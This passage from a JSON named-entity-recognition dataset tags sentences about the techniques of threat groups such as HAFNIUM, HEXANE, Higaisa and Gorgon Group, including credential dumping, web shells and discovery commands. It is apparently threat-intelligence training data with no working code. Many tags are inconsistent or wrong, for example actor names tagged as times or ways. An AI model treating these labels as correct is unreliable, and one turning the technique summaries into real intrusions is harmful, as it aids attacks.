"B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Gamaredon", "Group", "has", "used", "WMI", "to", "execute", "scripts", "used", "for", "discovery." ], "ner_tags": [ "B-Idus", "B-HackOrg", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Gorgon", "Group", "malware", "can", "decode", "contents", "from", "a", "payload", "that", "was", "Base64", "encoded", "and", "write", "the", "contents", "to", "a", "file." ], "ner_tags": [ "B-Idus", "B-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Features", "O", "O", "O", "O" ] }, { "tokens": [ "Gorgon", "Group", "malware", "can", "attempt", "to", "disable", "security", "features", "in", "Microsoft", "Office", "and", "Windows", "Defender", "using", "the", "<code>taskkill</code>", "command." ], "ner_tags": [ "B-Idus", "B-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-SamFile", "O" ] }, { "tokens": [ "Gorgon", "Group", "has", "used", "<code>-W", "Hidden</code>", "to", "conceal", "PowerShell", "windows", "by", "setting", "the", "WindowStyle", "parameter", "to", "hidden." ], "ner_tags": [ "B-Idus", "B-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O" ] }, { "tokens": [ "Gorgon", "Group", "malware", "can", "download", "additional", "files", "from", "C2", "servers." ], "ner_tags": [ "B-Idus", "B-HackOrg", "B-SecTeam", "O", "I-Features", "I-Features", "I-Features", "O", "O", "O" ] }, { "tokens": [ "Gorgon", "Group", "attempted", "to", "get", "users", "to", "launch", "malicious", "Microsoft", "Office", "attachments", "delivered", "via", "spearphishing", "emails." ], "ner_tags": [ "B-Idus", "B-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O" ] }, { "tokens": [ "Gorgon", "Group", "malware", "can", "deactivate", "security", "mechanisms", "in", "Microsoft", "Office", "by", "editing", "several", "keys", "and", "values", "under", "<code>HKCU\\Software\\Microsoft\\Office\\</code>." ], "ner_tags": [ "B-Idus", "B-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Features", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Gorgon", "Group", "malware", "can", "leverage", "the", "Windows", "API", "call,", "CreateProcessA(),", "for", "execution." ], "ner_tags": [ "B-Idus", "B-HackOrg", "B-Tool", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Gorgon", "Group", "malware", "can", "download", "a", "remote", "access", "tool,", "ShiftyBug,", "and", "inject", "into", "another", "process." ], "ner_tags": [ "B-Idus", "B-HackOrg", "B-Tool", "O", "B-Features", "O", "O", "O", "O", "B-Way", "O", "B-Features", "O", "O", "O" ] }, { "tokens": [ "Gorgon", "Group", "malware", "can", "use", "PowerShell", "commands", "to", "download", "and", "execute", "a", "payload", "and", "open", "a", "decoy", "document", "on", "the", "victim’s", "machine." ], "ner_tags": [ "B-Idus", "B-HackOrg", "O", "O", "O", "B-Way", "B-Tool", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Gorgon", "Group", "malware", "can", "use", "process", "hollowing", "to", "inject", "one", "of", "its", "trojans", "into", "another", "process." ], "ner_tags": [ "B-Idus", "I-HackOrg", "B-Tool", "O", "O", "O", "O", "O", "B-Features", "I-Features", "O", "O", "B-HackOrg", "O", "O", "O" ] }, { "tokens": [ "Gorgon", "Group", "malware", "can", "create", "a", ".lnk", "file", "and", "add", "a", "Registry", "Run", "key", "to", "establish", "persistence." ], "ner_tags": [ "B-Idus", "B-HackOrg", "B-Tool", "O", "O", "O", "B-SamFile", "I-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Gorgon", "Group", "malware", "can", "create", "a", ".lnk", "file", "and", "add", "a", "Registry", "Run", "key", "to", "establish", "persistence." ], "ner_tags": [ "B-Idus", "B-HackOrg", "B-Tool", "O", "O", "O", "B-SamFile", "I-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Gorgon", "Group", "sent", "emails", "to", "victims", "with", "malicious", "Microsoft", "Office", "documents", "attached." ], "ner_tags": [ "B-Idus", "B-HackOrg", "O", "B-Way", "O", "O", "O", "O", "B-Way", "O", "B-Way", "O" ] }, { "tokens": [ "Gorgon", "Group", "has", "obtained", "and", "used", "tools", "such", "as", "QuasarRAT", "and", "Remcos." ], "ner_tags": [ "B-Idus", "B-HackOrg", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O", "B-Way" ] }, { "tokens": [ "Gorgon", "Group", "has", "used", "macros", "in", "Spearphishing", "Attachments", "as", "well", "as", "executed", "VBScripts", "on", "victim", "machines." ], "ner_tags": [ "B-Idus", "B-HackOrg", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Gorgon", "Group", "malware", "can", "use", "cmd.exe", "to", "download", "and", "execute", "payloads", "and", "to", "execute", "commands", "on", "the", "system." ], "ner_tags": [ "B-Idus", "B-HackOrg", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Group5", "disguised", "its", "malicious", "binaries", "with", "several", "layers", "of", "obfuscation,", "including", "encrypting", "the", "files." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Malware", "used", "by", "Group5", "is", "capable", "of", "remotely", "deleting", "files", "from", "victims." ], "ner_tags": [ "B-Way", "O", "O", "B-Idus", "O", "O", "O", "O", "B-Features", "I-Features", "O", "O" ] }, { "tokens": [ "Malware", "used", "by", "Group5", "is", "capable", "of", "capturing", "keystrokes." ], "ner_tags": [ "B-Way", "O", "O", "B-Idus", "O", "O", "O", "I-Features", "B-HackOrg" ] }, { "tokens": [ "Malware", "used", "by", "Group5", "is", "capable", "of", "watching", "the", "victim's", "screen." ], "ner_tags": [ "B-Way", "O", "O", "B-Idus", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "HAFNIUM", "has", "granted", "privileges", "to", "domain", "accounts." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "HAFNIUM", "has", "used", "7-Zip", "and", "WinRAR", "to", "compress", "stolen", "files", "for", "exfiltration." ], "ner_tags": [ "B-Idus", "O", "O", "B-Way", "O", "B-Way", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "HAFNIUM", "has", "interacted", "with", "Office", "365", "tenants", "to", "gather", "details", "regarding", "target's", "environments." ], "ner_tags": [ "B-Idus", "O", "O", "O", "I-Org", "I-Org", "I-Org", "O", "I-Purp", "I-Purp", "O", "O", "O" ] }, { "tokens": [ "HAFNIUM", "has", "collected", "data", "and", "files", "from", "a", "compromised", "machine." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "HAFNIUM", "has", "created", "domain", "accounts." ], "ner_tags": [ "B-Org", "O", "O", "B-Way", "O" ] }, { "tokens": [ "HAFNIUM", "has", "collected", "e-mail", "addresses", "for", "users", "they", "intended", "to", "target." ], "ner_tags": [ "B-Idus", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "HAFNIUM", "has", "exfiltrated", "data", "to", "file", "sharing", "sites,", "including", "MEGA." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "B-Area" ] }, { "tokens": [ "HAFNIUM", "has", "exploited", "CVE-2021-44228", "in", "Log4j", "and", "CVE-2021-26855,", "CVE-2021-26857,", "CVE-2021-26858,", "and", "CVE-2021-27065", "to", "compromise", "on-premises", "versions", "of", "Microsoft", "Exchange", "Server." ], "ner_tags": [ "B-Idus", "O", "O", "B-Features", "O", "O", "O", "B-Features", "B-Features", "B-Features", "O", "B-Features", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "HAFNIUM", "has", "searched", "file", "contents", "on", "a", "compromised", "host." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "HAFNIUM", "gathered", "the", "fully", "qualified", "domain", "names", "(FQDNs)", "for", "targeted", "Exchange", "servers", "in", "the", "victim's", "environment." ], "ner_tags": [ "B-Org", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "HAFNIUM", "has", "hidden", "files", "on", "a", "compromised", "host." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "HAFNIUM", "has", "obtained", "IP", "addresses", "for", "publicly-accessible", "Exchange", "servers." ], "ner_tags": [ "B-Org", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "HAFNIUM", "has", "downloaded", "malware", "and", "tools--including", "Nishang", "and", "PowerCat--onto", "a", "compromised", "host." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "B-Way", "O", "B-Way", "O", "O", "O" ] }, { "tokens": [ "HAFNIUM", "has", "checked", "for", "network", "connectivity", "from", "a", "compromised", "host", "using", "`ping`,", "including", "attempts", "to", "contact", "`google[.]com`." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "HAFNIUM", "has", "used", "<code>procdump</code>", "to", "dump", "the", "LSASS", "process", "memory." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "HAFNIUM", "has", "used", "the", "NT", "AUTHORITY\\SYSTEM", "account", "to", "create", "files", "on", "Exchange", "servers." ], "ner_tags": [ "B-Idus", "O", "O", "O", "B-Tool", "B-SecTeam", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "HAFNIUM", "has", "stolen", "copies", "of", "the", "Active", "Directory", "database", "(NTDS.DIT)." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "HAFNIUM", "has", "used", "TCP", "for", "C2." ], "ner_tags": [ "B-Idus", "O", "O", "B-Way", "O", "O" ] }, { "tokens": [ "HAFNIUM", "has", "used", "the", "Exchange", "Power", "Shell", "module", "<code>Set-OabVirtualDirectoryPowerShell</code>", "to", "export", "mailbox", "data." ], "ner_tags": [ "B-Idus", "O", "O", "O", "I-Tool", "I-Tool", "I-Tool", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "HAFNIUM", "has", "used", "`tasklist`", "to", "enumerate", "processes." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "HAFNIUM", "has", "used", "web", "shells", "to", "export", "mailbox", "data." ], "ner_tags": [ "B-Idus", "O", "O", "I-Tool", "I-Tool", "O", "O", "O", "O" ] }, { "tokens": [ "HAFNIUM", "has", "enumerated", "domain", "controllers", "using", "`net", "group", "\"Domain", "computers\"`", "and", "`nltest", "/dclist`." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "HAFNIUM", "has", "used", "<code>rundll32</code>", "to", "load", "malicious", "DLLs." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "HAFNIUM", "has", "used", "ASCII", "encoding", "for", "C2", "traffic." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "HAFNIUM", "has", "collected", "IP", "information", "via", "IPInfo." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "HAFNIUM", "has", "used", "`whoami`", "to", "gather", "user", "information." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "I-Purp", "I-Purp", "O" ] }, { "tokens": [ "HAFNIUM", "has", "operated", "from", "leased", "virtual", "private", "servers", "(VPS)", "in", "the", "United", "States." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O", "O", "I-Area", "O" ] }, { "tokens": [ "HAFNIUM", "has", "used", "open-source", "C2", "frameworks,", "including", "Covenant." ], "ner_tags": [ "B-Idus", "O", "O", "O", "B-Way", "B-Way", "O", "B-Tool" ] }, { "tokens": [ "HAFNIUM", "has", "acquired", "web", "services", "for", "use", "in", "C2", "and", "exfiltration." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "HAFNIUM", "has", "deployed", "multiple", "web", "shells", "on", "compromised", "servers", "including", "SIMPLESEESHARP,", "SPORTSBALL,", "China", "Chopper,", "and", "ASPXSpy." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "B-Way", "I-Tool", "O", "O", "B-Way" ] }, { "tokens": [ "HAFNIUM", "has", "used", "`cmd.exe`", "to", "execute", "commands", "on", "the", "victim's", "machine." ], "ner_tags": [ "B-Idus", "O", "O", "B-SamFile", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "HEXANE", "has", "used", "a", "PowerShell-based", "keylogging", "tool", "to", "capture", "the", "window", "title." ], "ner_tags": [ "B-Idus", "O", "O", "O", "B-Way", "I-Tool", "I-Tool", "O", "O", "I-Features", "I-Features", "O" ] }, { "tokens": [ "HEXANE", "has", "used", "cloud", "services,", "including", "OneDrive,", "for", "C2." ], "ner_tags": [ "B-Idus", "O", "O", "I-Tool", "O", "O", "B-Way", "O", "O" ] }, { "tokens": [ "HEXANE", "has", "used", "brute", "force", "attacks", "to", "compromise", "valid", "credentials." ], "ner_tags": [ "B-Idus", "O", "O", "B-Org", "I-OffAct", "I-OffAct", "O", "I-Purp", "I-Purp", "O" ] }, { "tokens": [ "HEXANE", "has", "used", "Base64-encoded", "scripts." ], "ner_tags": [ "B-Idus", "O", "O", "B-Way", "B-Tool" ] }, { "tokens": [ "HEXANE", "has", "run", "`cmdkey`", "on", "victim", "machines", "to", "identify", "stored", "credentials." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "HEXANE", "has", "used", "a", "Mimikatz-based", "tool", "and", "a", "PowerShell", "script", "to", "steal", "passwords", "from", "Google", "Chrome." ], "ner_tags": [ "B-Idus", "O", "O", "O", "B-Way", "B-Tool", "O", "O", "B-Way", "B-Tool", "O", "I-Purp", "I-Purp", "O", "O", "O" ] }, { "tokens": [ "HEXANE", "has", "set", "up", "custom", "DNS", "servers", "to", "send", "commands", "to", "compromised", "hosts", "via", "TXT", "records." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "B-Tool", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "HEXANE", "has", "registered", "and", "operated", "domains", "for", "campaigns,", "often", "using", "a", "security", "or", "web", "technology", "theme", "or", "impersonating", "the", "targeted", "organization." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "B-OffAct", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "HEXANE", "has", "used", "compromised", "accounts", "to", "send", "spearphishing", "emails." ], "ner_tags": [ "B-Idus", "O", "O", "I-Tool", "I-Tool", "O", "O", "B-Way", "O" ] }, { "tokens": [ "HEXANE", "has", "established", "email", "accounts", "for", "use", "in", "domain", "registration", "including", "for", "ProtonMail", "addresses." ], "ner_tags": [ "B-Org", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O" ] }, { "tokens": [ "HEXANE", "has", "targeted", "executives,", "human", "resources", "staff,", "and", "IT", "personnel", "for", "spearphishing." ], "ner_tags": [ "B-Idus", "O", "O", "B-Org", "B-Org", "B-SecTeam", "B-Org", "O", "I-Org", "I-Org", "O", "B-Way" ] }, { "tokens": [ "HEXANE", "has", "used", "cloud", "services,", "including", "OneDrive,", "for", "data", "exfiltration." ], "ner_tags": [ "B-Idus", "O", "O", "I-Tool", "O", "O", "B-Way", "O", "I-Purp", "O" ] }, { "tokens": [ "HEXANE", "has", "identified", "specific", "potential", "victims", "at", "targeted", "organizations." ], "ner_tags": [ "B-Time", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "HEXANE", "has", "identified", "executives,", "HR,", "and", "IT", "staff", "at", "victim", "organizations", "for", "further", "targeting." ], "ner_tags": [ "B-Time", "O", "O", "B-Org", "B-Time", "O", "I-Org", "I-Org", "O", "I-Org", "I-Org", "O", "O", "O" ] }, { "tokens": [ "HEXANE", "has", "downloaded", "additional", "payloads", "and", "malicious", "scripts", "onto", "a", "compromised", "host." ], "ner_tags": [ "B-Idus", "O", "I-Features", "I-Features", "B-HackOrg", "O", "O", "B-Tool", "O", "O", "O", "O" ] }, { "tokens": [ "HEXANE", "has", "conducted", "internal", "spearphishing", "attacks", "against", "executives,", "HR,", "and", "IT", "personnel", "to", "gain", "information", "and", "access." ], "ner_tags": [ "B-Idus", "O", "O", "O", "B-Org", "B-OffAct", "O", "B-Org", "B-Org", "O", "I-Org", "I-Org", "O", "I-Purp", "I-Purp", "O", "O" ] }, { "tokens": [ "HEXANE", "has", "used", "tools", "including", "BITSAdmin", "to", "test", "internet", "connectivity", "from", "compromised", "hosts." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "HEXANE", "has", "used", "a", "PowerShell-based", "keylogger", "named", "`kl.ps1`." ], "ner_tags": [ "B-Idus", "O", "O", "O", "B-Way", "B-Tool", "O", "B-SamFile" ] }, { "tokens": [ "HEXANE", "has", "run", "`net", "localgroup`", "to", "enumerate", "local", "groups." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "HEXANE", "has", "relied", "on", "victim's", "executing", "malicious", "file", "attachments", "delivered", "via", "email", "or", "embedded", "within", "actor-controlled", "websites", "to", "deliver", "malware." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "HEXANE", "has", "used", "password", "spraying", "attacks", "to", "obtain", "valid", "credentials." ], "ner_tags": [ "B-Idus", "O", "O", "I-OffAct", "I-OffAct", "I-OffAct", "O", "I-Purp", "I-Purp", "O" ] }, { "tokens": [ "HEXANE", "has", "used", "PowerShell-based", "tools", "and", "scripts", "for", "discovery", "and", "collection", "on", "compromised", "hosts." ], "ner_tags": [ "B-Idus", "O", "O", "B-Way", "B-Tool", "O", "B-Tool", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "HEXANE", "has", "enumerated", "processes", "on", "targeted", "systems." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "HEXANE", "has", "used", "remote", "desktop", "sessions", "for", "lateral", "movement." ], "ner_tags": [ "B-Idus", "O", "O", "B-Tool", "I-Way", "I-Way", "O", "O", "O" ] }, { "tokens": [ "HEXANE", "has", "used", "`net", "view`", "to", "enumerate", "domain", "machines." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "HEXANE", "has", "used", "a", "scheduled", "task", "to", "establish", "persistence", "for", "a", "keylogger." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way" ] }, { "tokens": [ "HEXANE", "has", "established", "fraudulent", "LinkedIn", "accounts", "impersonating", "HR", "department", "employees", "to", "target", "potential", "victims", "with", "fake", "job", "offers." ], "ner_tags": [ "B-Time", "O", "O", "O", "O", "O", "O", "B-Org", "I-Org", "I-Org", "O", "O", "I-Purp", "I-Purp", "O", "O", "O", "O" ] }, { "tokens": [ "HEXANE", "has", "enumerated", "programs", "installed", "on", "an", "infected", "machine." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "HEXANE", "has", "collected", "the", "hostname", "of", "a", "compromised", "machine." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "HEXANE", "has", "used", "Ping", "and", "`tracert`", "for", "network", "discovery." ], "ner_tags": [ "B-Idus", "O", "O", "B-Tool", "O", "O", "O", "O", "O" ] }, { "tokens": [ "HEXANE", "has", "used", "netstat", "to", "monitor", "connections", "to", "specific", "ports." ], "ner_tags": [ "B-Idus", "O", "O", "B-Way", "O", "I-Features", "I-Features", "O", "O", "O" ] }, { "tokens": [ "HEXANE", "has", "run", "`whoami`", "on", "compromised", "machines", "to", "identify", "the", "current", "user." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "HEXANE", "has", "acquired,", "and", "sometimes", "customized,", "open", "source", "tools", "such", "as", "Mimikatz,", "Empire,", "VNC", "remote", "access", "software,", "and", "DIG.net." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "B-Tool", "B-Way", "I-Tool", "I-Tool", "O", "O", "B-Tool" ] }, { "tokens": [ "HEXANE", "has", "staged", "malware", "on", "fraudulent", "websites", "set", "up", "to", "impersonate", "targeted", "organizations." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "HEXANE", "has", "used", "a", "VisualBasic", "script", "named", "`MicrosoftUpdator.vbs`", "for", "execution", "of", "a", "PowerShell", "keylogger." ], "ner_tags": [ "B-Idus", "O", "O", "O", "B-Way", "B-Tool", "O", "B-SamFile", "O", "O", "O", "O", "B-Way", "B-Tool" ] }, { "tokens": [ "HEXANE", "has", "used", "WMI", "event", "subscriptions", "for", "persistence." ], "ner_tags": [ "B-Idus", "O", "O", "B-Way", "I-Tool", "I-Tool", "O", "O" ] }, { "tokens": [ "Higaisa", "performed", "padding", "with", "null", "bytes", "before", "calculating", "its", "hash." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Higaisa’s", "JavaScript", "file", "used", "a", "legitimate", "Microsoft", "Office", "2007", "package", "to", "side-load", "the", "<code>OINFO12.OCX</code>", "dynamic", "link", "library." ], "ner_tags": [ "B-Idus", "B-SamFile", "I-SamFile", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "B-SamFile", "O", "O", "O" ] }, { "tokens": [ "Higaisa", "used", "certutil", "to", "decode", "Base64", "binaries", "at", "runtime", "and", "a", "16-byte", "XOR", "key", "to", "decrypt", "data." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Higaisa", "used", "Base64", "encoded", "compressed", "payloads." ], "ner_tags": [ "B-Idus", "O", "B-Way", "O", "O", "O" ] }, { "tokens": [ "Higaisa", "exfiltrated", "data", "over", "its", "C2", "channel." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Higaisa", "has", "exploited", "CVE-2018-0798", "for", "execution." ], "ner_tags": [ "B-Idus", "O", "O", "B-Features", "O", "O" ] }, { "tokens": [ "Higaisa", "used", "a", "payload", "that", "creates", "a", "hidden", "window." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Higaisa", "discovered", "system", "proxy", "settings", "and", "used", "them", "if", "available." ], "ner_tags": [ "B-Time", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Higaisa", "used", "JavaScript", "to", "execute", "additional", "files." ], "ner_tags": [ "B-Idus", "O", "B-Way", "O", "O", "O", "O" ] }, { "tokens": [ "Higaisa", "used", "malicious", "e-mail", "attachments", "to", "lure", "victims", "into", "executing", "LNK", "files." ], "ner_tags": [ "B-Idus", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Higaisa", "named", "a", "shellcode", "loader", "binary", "<code>svchast.exe</code>", "to", "spoof", "the", "legitimate", "<code>svchost.exe</code>." ], "ner_tags": [ "B-Time", "O", "O", "O", "O", "O", "B-SamFile", "O", "O", "O", "O", "B-Way" ] }, { "tokens": [ "Higaisa", "has", "called", "various", "native", "OS", "APIs." ], "ner_tags": [ "B-Time", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Higaisa’s", "shellcode", "attempted", "to", "find", "the", "process", "ID", "of", "the", "current", "process." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Higaisa", "used", "a", "FakeTLS", "session", "for", "C2", "communications." ], "ner_tags": [ "B-Idus", "O", "O", "B-Way", "O", "O", "O", "O" ] }, { "tokens": [ "Higaisa", "added", "a", "spoofed", "binary", "to", "the", "start-up", "folder", "for", "persistence." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Higaisa", "dropped", "and", "added", "<code>officeupdate.exe</code>", "to", "scheduled", "tasks." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Higaisa", "sent", "the", "victim", "computer", "identifier", "in", "a", "User-Agent", "string", "back", "to", "the", "C2", "server", "every", "10", "minutes." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Higaisa", "has", "sent", "spearphishing", "emails", "containing", "malicious", "attachments." ], "ner_tags": [ "B-Idus", "O", "O", "B-Way", "I-Way", "O", "O", "O" ] }, { "tokens": [ "Higaisa", "used", "AES-128", "to", "encrypt", "C2", "traffic." ], "ner_tags": [ "B-Idus", "O", "B-Way", "O", "O", "O", "O" ] }, { "tokens": [ "Higaisa", "collected", "the", "system", "volume", "serial", "number,", "GUID,", "and", "computer", "name." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Higaisa", "used", "<code>ipconfig</code>", "to", "gather", "network", "configuration", "information." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Higaisa", "used", "a", "function", "to", "gather", "the", "current", "time." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "I-Purp", "I-Purp", "I-Purp", "O" ] }, { "tokens": [ "Higaisa", "has", "used", "VBScript", "code", "on", "the", "victim's", "machine." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Higaisa", "used", "HTTP", "and", "HTTPS", "to", "send", "data", "back", "to", "its", "C2", "server." ], "ner_tags": [ "B-Idus", "O", "B-Way", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Higaisa", "used", "<code>cmd.exe</code>", "for", "execution." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O" ] }, { "tokens": [ "Higaisa", "used", "an", "XSL", "file", "to", "run", "VBScript", "code." ], "ner_tags": [ "B-Idus", "O", "O", "B-SamFile", "I-SamFile", "O", "O", "O", "O" ] }, { "tokens": [ "Inception", "used", "a", "browser", "plugin", "to", "steal", "passwords", "and", "sessions", "from", "Internet", "Explorer,", "Chrome,", "Opera,", "Firefox,", "Torch,", "and", "Yandex." ], "ner_tags": [ "B-Idus", "O", "O", "B-Tool", "O", "O", "I-Purp", "I-Purp", "O", "O", "O", "B-Tool", "O", "B-Way", "B-Tool", "B-Way", "B-Way", "O", "B-Way" ] }, { "tokens": [ "Inception", "used", "a", "file", "hunting", "plugin", "to", "collect", ".txt,", ".pdf,", ".xls", "or", ".doc", "files", "from", "the", "infected", "host." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "B-SamFile", "B-SamFile", "B-SamFile", "O", "B-SamFile", "B-Tool", "O", "O", "O", "O" ] }, { "tokens": [ "Inception", "has", "used", "specific", "malware", "modules", "to", "gather", "domain", "membership." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "I-Purp", "I-Purp", "O" ] }, { "tokens": [ "Inception", "has", "encrypted", "malware", "payloads", "dropped", "on", "victim", "machines", "with", "AES", "and", "RC4", "encryption." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O" ] }, { "tokens": [ "Inception", "has", "exploited", "CVE-2012-0158,", "CVE-2014-1761,", "CVE-2017-11882", "and", "CVE-2018-0802", "for", "execution." ], "ner_tags": [ "B-Idus", "O", "O", "B-Features", "B-Features", "B-Features", "O", "B-Features", "O", "O" ] }, { "tokens": [ "Inception", "used", "a", "file", "listing", "plugin", "to", "collect", "information", "about", "file", "and", "directories", "both", "on", "local", "and", "remote", "drives." ], "ner_tags": [ "B-Idus", "O", "O", "I-Tool", "I-Tool", "I-Tool", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Inception", "lured", "victims", "into", "clicking", "malicious", "files", "for", "machine", "reconnaissance", "and", "to", "execute", "malware." ], "ner_tags": [ "B-Idus", "O", "O", "O", "I-Way", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Inception", "has", "used", "malicious", "HTA", "files", "to", "drop", "and", "execute", "malware." ], "ner_tags": [ "B-Idus", "O", "O", "O", "B-SamFile", "I-SamFile", "O", "O", "O", "O", "O" ] }, { "tokens": [ 